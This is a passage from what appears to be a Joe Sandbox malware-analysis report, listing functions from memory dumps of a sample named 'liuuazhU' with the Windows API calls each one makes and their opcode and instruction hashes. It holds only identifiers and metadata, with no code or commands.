                                                                                        • Opcode Fuzzy Hash: 5b7cb4800b1de85664a3beb0cb757eb9ef359187b46ea685e9f33d28d6386da2
                                                                                        • Instruction Fuzzy Hash: 444145B9D002589FCF00CFAAD984ADEBBF5BB09310F14906AE918AB321D375A945CF54
                                                                                        Function 1CFCEF78 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 1CFCF01C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108680787.000000001CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CFC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cfc0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 78d3849dda654223b542d53588b02cefe3e73106574cf6f861fae438713d82f3
                                                                                        • Instruction ID: ae112f8e7153c56b6d8a8c81d67d6b3577c1732915c7df22407a5d1cd3c37120
                                                                                        • Opcode Fuzzy Hash: 78d3849dda654223b542d53588b02cefe3e73106574cf6f861fae438713d82f3
                                                                                        • Instruction Fuzzy Hash: B231A7B4E012599FCF14CFA9D980ADEFBB0BF49310F20902AE819B7210D735A945CF68
                                                                                        Function 21171DC0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 21171E81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 868dee09fd44fde61cd8cfe813eedad646ae6b5cff2a5afd9da0cccd5b0ec978
                                                                                        • Instruction ID: 96bfd1cb8ab6b01b04a2a10e7ab98b000e0507c359e70feb348047209fd9fe61
                                                                                        • Opcode Fuzzy Hash: 868dee09fd44fde61cd8cfe813eedad646ae6b5cff2a5afd9da0cccd5b0ec978
                                                                                        • Instruction Fuzzy Hash: F04146B4900319CFCB15CF89C888AAABBF5FF88314F24C959D518AB321D774A941CFA0
                                                                                        Function 2101D780 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 2101D812
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 88695f2b86b71bc2a6dc0a1573de41758d2b6568749c71decdd96bee466f5933
                                                                                        • Instruction ID: e93931a11ee8ca3257a6829bb2ef893c9828b3e9c2ebb690f38d86139042e60c
                                                                                        • Opcode Fuzzy Hash: 88695f2b86b71bc2a6dc0a1573de41758d2b6568749c71decdd96bee466f5933
                                                                                        • Instruction Fuzzy Hash: 1B31A7B8D00259DFCB14CFAAD584ADEFBF5AB49310F14906AE818B7320D375A945CFA4
                                                                                        Function 20186373 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 201864B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d176e93356051a1edfba610ddd6f18fb2e11cb5b33297a2a0ce1d02bcf0adc1b
                                                                                        • Instruction ID: 3843ce8deb3c08bae075ea9aac7caca290fd2b0523bc8bb8edc15b0048238b8b
                                                                                        • Opcode Fuzzy Hash: d176e93356051a1edfba610ddd6f18fb2e11cb5b33297a2a0ce1d02bcf0adc1b
                                                                                        • Instruction Fuzzy Hash: 2C113DB4A011199FEB04DFE8D884EADBBB5FB88304F61D165E914E7246DB34AB45CF10
                                                                                        Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocString_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 959018026-0
                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                        Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                        Function 20D12D7F Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 3b7ef69404cd39e3ded5471c4f76b8bcba15889d7d9fada08a1ec43aea3810b6
                                                                                        • Instruction ID: 89221f5bb7e141ad0d9f28e72aaf5abb3b112404cf76b924e5ae18f17f1d9a00
                                                                                        • Opcode Fuzzy Hash: 3b7ef69404cd39e3ded5471c4f76b8bcba15889d7d9fada08a1ec43aea3810b6
                                                                                        • Instruction Fuzzy Hash: DA4149756041158FCB058FA4E888BAABBB5BB88710F1400A9F905CB3B2CB36DD95CF91
                                                                                        Function 20D130C8 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 3bef12c024d2e7bc5d376adf941f21295a83dea050eaa3149d83777c29b48fc6
                                                                                        • Instruction ID: 0a759f17121f27f52d069a29d71a766699e09440a400199b6b4a120366db3098
                                                                                        • Opcode Fuzzy Hash: 3bef12c024d2e7bc5d376adf941f21295a83dea050eaa3149d83777c29b48fc6
                                                                                        • Instruction Fuzzy Hash: 5421A230709396AFDF058FA6ADC0AABBBEAAB85610B14442DE945C7240DF34CCC19760
                                                                                        Function 1CFCF248 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108680787.000000001CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CFC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cfc0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 5af22909b34da3df8bcbf401e74d1d5b20f52336e82d28d55443a318ef366def
                                                                                        • Instruction ID: 0e0941b27590021443c9413ac110973c70421edba4a958352b6099f01b363477
                                                                                        • Opcode Fuzzy Hash: 5af22909b34da3df8bcbf401e74d1d5b20f52336e82d28d55443a318ef366def
                                                                                        • Instruction Fuzzy Hash: 7931ACB4E012199FCB14CFAAD580ADEFBB4AF49310F10942AE415B7310C735A941CF68
                                                                                        Function 20D14120 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4193400c0abbd4107c4db96ca78f44d3fcb1e2556d4a2f6170d9fbb049e41d7a
                                                                                        • Instruction ID: 8ab820ec92e69f102ac721ffadc98ef77c37bca3143cfac7f9365cf40c6ef055
                                                                                        • Opcode Fuzzy Hash: 4193400c0abbd4107c4db96ca78f44d3fcb1e2556d4a2f6170d9fbb049e41d7a
                                                                                        • Instruction Fuzzy Hash: 9FD10B75A412158FCB05CFA8E584A9DBBF6FF89710B1A8099E915AB371CB31FC81CB50
                                                                                        Function 20D14001 Relevance: .3, Instructions: 306COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 31c8667b4a2c925e677649a2f137b52cc3e7f1013b4c28ef814079fafcab2789
                                                                                        • Instruction ID: bb79933703e94e929e0c13d2acd5fd7d5f22cd0308f0a138f8be4806b9e825ff
                                                                                        • Opcode Fuzzy Hash: 31c8667b4a2c925e677649a2f137b52cc3e7f1013b4c28ef814079fafcab2789
                                                                                        • Instruction Fuzzy Hash: 56D11975E412159FCB04CFA8D984A9EFBF6FF49310B1A8159E915AB362CB34EC81CB50
                                                                                        Function 20D10D30 Relevance: .2, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f2f0b20eef5fc713076e9b8e65a7596a2e2f7159005ce04ed92d020b44ae0068
                                                                                        • Instruction ID: a0a8bceaacef9e344b9822da3440fa821c82b02ac48eb02fe4d1fd54d061dbae
                                                                                        • Opcode Fuzzy Hash: f2f0b20eef5fc713076e9b8e65a7596a2e2f7159005ce04ed92d020b44ae0068
                                                                                        • Instruction Fuzzy Hash: D67102307052118FC705ABB9D89872EBBE6AFC8700B58846DE906DB395CF74DC86C795
                                                                                        Function 20D12F81 Relevance: .2, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52b2b56498301cd5c9836182a6de206c670239efa5f582633ef564f74cbd2b63
                                                                                        • Instruction ID: e2c2c9f9b127b1f9daaf395dc2de524ba1a7addead8ec673e3e20e91c198f9f6
                                                                                        • Opcode Fuzzy Hash: 52b2b56498301cd5c9836182a6de206c670239efa5f582633ef564f74cbd2b63
                                                                                        • Instruction Fuzzy Hash: BB51A6317152519FCB04DFB9E8D8E2ABBE9AF8965031944ADE509CB362DF31DC818B60
                                                                                        Function 20D1D3E8 Relevance: .2, Instructions: 164COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e2f55a4b226cd49d2fcbae5d2a117b104d8c4a9a1875c8027307fc76175a97eb
                                                                                        • Instruction ID: 06c5b01c76464132d75154d63257df66b4f8dc84926c82f32a13d75dfc542971
                                                                                        • Opcode Fuzzy Hash: e2f55a4b226cd49d2fcbae5d2a117b104d8c4a9a1875c8027307fc76175a97eb
                                                                                        • Instruction Fuzzy Hash: 5171D074E01229DFDB24DFA5D994BAEBBB2BF84304F2080A9D409AB354DB355E85CF41
                                                                                        Function 20D1E469 Relevance: .1, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 964c2549b0168755f4ee77ae05d02f89c4d474d57986f44775d61aee259e2ed1
                                                                                        • Instruction ID: 2b32ebcf5033ea1dbf8273ddb354da7d93a6e7b676d0e93076949441d0af19a4
                                                                                        • Opcode Fuzzy Hash: 964c2549b0168755f4ee77ae05d02f89c4d474d57986f44775d61aee259e2ed1
                                                                                        • Instruction Fuzzy Hash: 8261AE74E02228CFDB65DFA4D990BDDBBB1BB49304F1484EAE409A7250EB359E85CF50
                                                                                        Function 20D1FD76 Relevance: .1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc945765d871fffd60cc6a2f93a06e347f91daaac474e144356cba51f1625bea
                                                                                        • Instruction ID: 4c46b1e7fa0be08a8de28a36ecce9da48b144b7c1e058773b09514546db6efb3
                                                                                        • Opcode Fuzzy Hash: bc945765d871fffd60cc6a2f93a06e347f91daaac474e144356cba51f1625bea
                                                                                        • Instruction Fuzzy Hash: 83518235D0021A9FCB01CFE0D844ADDFBBAFF8A314F258215F515AB2A5DB74A986CB50
                                                                                        Function 20D1D3D8 Relevance: .1, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e8fd57a91b3be4c57499853843e5b1fb430521e704f6480117459d77fcdb3471
                                                                                        • Instruction ID: ed08e7f207bbb925e4edc092fa5a571978c5d32b6ecfdf090cef497c4d148fd8
                                                                                        • Opcode Fuzzy Hash: e8fd57a91b3be4c57499853843e5b1fb430521e704f6480117459d77fcdb3471
                                                                                        • Instruction Fuzzy Hash: 8D314670D022189EDB15CFB5D884BDEBBB1AF89304F20842DD419AB251DB78194ACF51
                                                                                        Function 1CF5D514 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108105535.000000001CF5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cf5d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f772570a9b41fdc6846ea978d31e298c628716b8faa60988bf067f1009863a9b
                                                                                        • Instruction ID: b3c0602009e626bb4976ee124949841e8f54f1d1f4927db5520261f3e81aec56
                                                                                        • Opcode Fuzzy Hash: f772570a9b41fdc6846ea978d31e298c628716b8faa60988bf067f1009863a9b
                                                                                        • Instruction Fuzzy Hash: 0421F5B2505240DFDB05DF14DAC0B1BBF65FB88318F24C669EA094B29AC336D457CAB2
                                                                                        Function 1CF6D005 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108237725.000000001CF6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cf6d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f4e78eb827fc68b47ae314f5e79b5916453a14977a79b2f6e4a45c6ac3836ed
                                                                                        • Instruction ID: 3cbf90a04498a118bbd5be3335dee3cabbed3bc40edc176dab6a866dcccf4f7b
                                                                                        • Opcode Fuzzy Hash: 7f4e78eb827fc68b47ae314f5e79b5916453a14977a79b2f6e4a45c6ac3836ed
                                                                                        • Instruction Fuzzy Hash: BE215A715093C09FD7039B24D994B01BF71EB46214F29C6DBD8898F6A7C23A984ACB72
                                                                                        Function 1CF6D030 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108237725.000000001CF6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cf6d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f7a21798f7cd08cb8dbf4ba2fdf3b53dbd1be276d624de86fd436d7b6140306
                                                                                        • Instruction ID: 53f3810790957ce779adbfeee4d6c8de7d9e1645467c9162cb139b218ed69409
                                                                                        • Opcode Fuzzy Hash: 9f7a21798f7cd08cb8dbf4ba2fdf3b53dbd1be276d624de86fd436d7b6140306
                                                                                        • Instruction Fuzzy Hash: D6210471504244EFDB00DF14DAC0B16BBA5EB84314F20C66DD8894B69AC33BD887CA72
                                                                                        Function 20D11AC0 Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e55891167e5b7a5e2148564e23a44c3d945fb0f9cd90f0b9205d8b1d9e16eade
                                                                                        • Instruction ID: 05194b355bb7a5d639c9183df17eada414fad85abeea1ba9c9d51699ab124411
                                                                                        • Opcode Fuzzy Hash: e55891167e5b7a5e2148564e23a44c3d945fb0f9cd90f0b9205d8b1d9e16eade
                                                                                        • Instruction Fuzzy Hash: FD21FD34A08308DFCB10CF94D948BAAFBF6EB49310F08846EE0998B252E774DD84CB50
                                                                                        Function 20D13E49 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d336e93b6ae09c18a60e8febe16fc7ded6b5dad3cd42a7416bd23949c8bd5e81
                                                                                        • Instruction ID: ba54fa3a28f151368e3900690743f4337ad79f01f342cd62d8e5d81869ed35cf
                                                                                        • Opcode Fuzzy Hash: d336e93b6ae09c18a60e8febe16fc7ded6b5dad3cd42a7416bd23949c8bd5e81
                                                                                        • Instruction Fuzzy Hash: E9118175B01204AFDB158FA8D898BDDBBB6FF8C311F244569E915A7390CB319C51CB90
                                                                                        Function 1CF5D50F Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108105535.000000001CF5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cf5d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                        • Instruction ID: 83d9af3ea78e1afb7a329d8b7ef73f36e434632b3135a65e83cc6fb295672eeb
                                                                                        • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                        • Instruction Fuzzy Hash: 1911D376505280CFDB02CF14D6C4B06BF72FB84318F24C6A9D9094B65AC336D55ACBB2
                                                                                        Function 20D10738 Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: acce14f64b4111714c42f610f0181ca11e2846d5bc69123666690d4f1f326fc0
                                                                                        • Instruction ID: b918c476b55f97add3acf676a3ae7084bbf878634b4af1532003cef142ee5cb2
                                                                                        • Opcode Fuzzy Hash: acce14f64b4111714c42f610f0181ca11e2846d5bc69123666690d4f1f326fc0
                                                                                        • Instruction Fuzzy Hash: 5801D6727001186F8B069ED9AC04BEF7BEBDBC8690F148029FA05D7380DEB1DC119BA4
                                                                                        Function 1CF5D01D Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108105535.000000001CF5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cf5d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38b8eb9ec240e82b15e127454fe7b988a10446674b1299573cb83dff64b1d333
                                                                                        • Instruction ID: 1efb7856f8a170a38c68ce8711e69a5e95e2e473571a9629f9e2bb08710ba4ae
                                                                                        • Opcode Fuzzy Hash: 38b8eb9ec240e82b15e127454fe7b988a10446674b1299573cb83dff64b1d333
                                                                                        • Instruction Fuzzy Hash: 7301DB7140A3409AE7105E26CE84757BFD8DF45324F18C529EE484B2CAC279D847C6B2
                                                                                        Function 1CF5D005 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108105535.000000001CF5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cf5d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8e21f9a37d95503fb8e11598a629dfc070a695afe4e8fd200e1259bb658babd3
                                                                                        • Instruction ID: a0afee577ff94f47c50517a19210e28536276781dc00c9ad31b06fa3632a381b
                                                                                        • Opcode Fuzzy Hash: 8e21f9a37d95503fb8e11598a629dfc070a695afe4e8fd200e1259bb658babd3
                                                                                        • Instruction Fuzzy Hash: D301527140E3C05EE3024B258994752BFB8EF43224F19C5DBD9888F1D7C2699849C772
                                                                                        Function 20D10727 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1ec44694b4cb9bbda5b4adf6a8394b86a0a6e9be7fa4d230931d69394ed226f6
                                                                                        • Instruction ID: 99ddc081567c3ddf937af5e611fab3ffde9b0e9b3f6d8dcda0bb4996d2800c11
                                                                                        • Opcode Fuzzy Hash: 1ec44694b4cb9bbda5b4adf6a8394b86a0a6e9be7fa4d230931d69394ed226f6
                                                                                        • Instruction Fuzzy Hash: FB012B726052486FCB038E949C04BEE7FA7DFC8390F14806AF504D7295CA75DC11DB94
                                                                                        Function 20D12ED8 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d910da820fe6e6c13472b5727ac0d64b7049b3e4b6b7b1de02277f8cded208c6
                                                                                        • Instruction ID: d6a4e781665e78dd4522f2d7cd1589dfb2b21e8571a94bbd2f8639743c775e15
                                                                                        • Opcode Fuzzy Hash: d910da820fe6e6c13472b5727ac0d64b7049b3e4b6b7b1de02277f8cded208c6
                                                                                        • Instruction Fuzzy Hash: 9FF0C2353126104B87055A6FA848B2AB7EDBFC8A9171500ADFA09CB361DE22CC43CB80
                                                                                        Function 20D11327 Relevance: .0, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
